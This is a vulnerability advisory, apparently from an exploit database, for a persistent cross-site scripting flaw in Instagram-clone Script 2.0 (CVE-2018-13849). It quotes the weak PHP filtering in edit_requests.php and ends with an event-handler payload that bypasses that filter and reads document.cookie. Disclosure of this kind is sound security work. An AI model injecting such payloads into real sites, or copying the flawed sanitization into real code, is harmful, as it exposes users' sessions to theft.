Instagram-clone Script 2.0 - Cross-Site Scripting

vendor:

Instagram-clone

by:

L0RD

6.1

CVSS

MEDIUM

Cross-Site Scripting

CWE

Product Name: Instagram-clone

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: CVE-2018-13849

CPE: 2.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2018

Instagram-clone Script 2.0 – Cross-Site Scripting

Instagram-clone Script 2.0 is vulnerable to Cross-Site Scripting. This vulnerability is due to insufficient sanitization of user-supplied input in the 'edit_requests.php' file. An attacker can exploit this vulnerability to execute arbitrary HTML and script code in the browser of the victim in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to update the application state. All input data should be validated and filtered before being used in the application. Sanitization should be used to ensure that malicious code is not executed.

Source

Exploit-DB raw data:

# Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting
# Date: 2018-07-10
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
# Version: 2.0
# CVE: CVE-2018-13849
# Tested on: Kali linux

# POC : Persistent Cross site scripting :
# vulnerable file : edit_requests.php
# vulnerable code :

if (isset($_POST['username'])) {
      $username = preg_replace("#[<> ]#i", "", $_POST['username']);
      $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
      $surname = preg_replace("#[<> ]#i", "", $_POST['surname']);
      $bio = preg_replace("#[<>]#i", "", $_POST['bio']);
      $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
      $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);
      $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);
      $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);
      $website = preg_replace("#[<>]#i", "", $_POST['website']);
      $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
      $tags = preg_replace("#[\s]#", "-", $_POST['tags']);
 $session = $_SESSION['id'];

      $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio,
$instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
      $array = array("mssg" => $m);
      echo json_encode($array);
    }

# We use this payload to bypass filter :
# Payload : 

"onmouseover=" alert(document.cookie)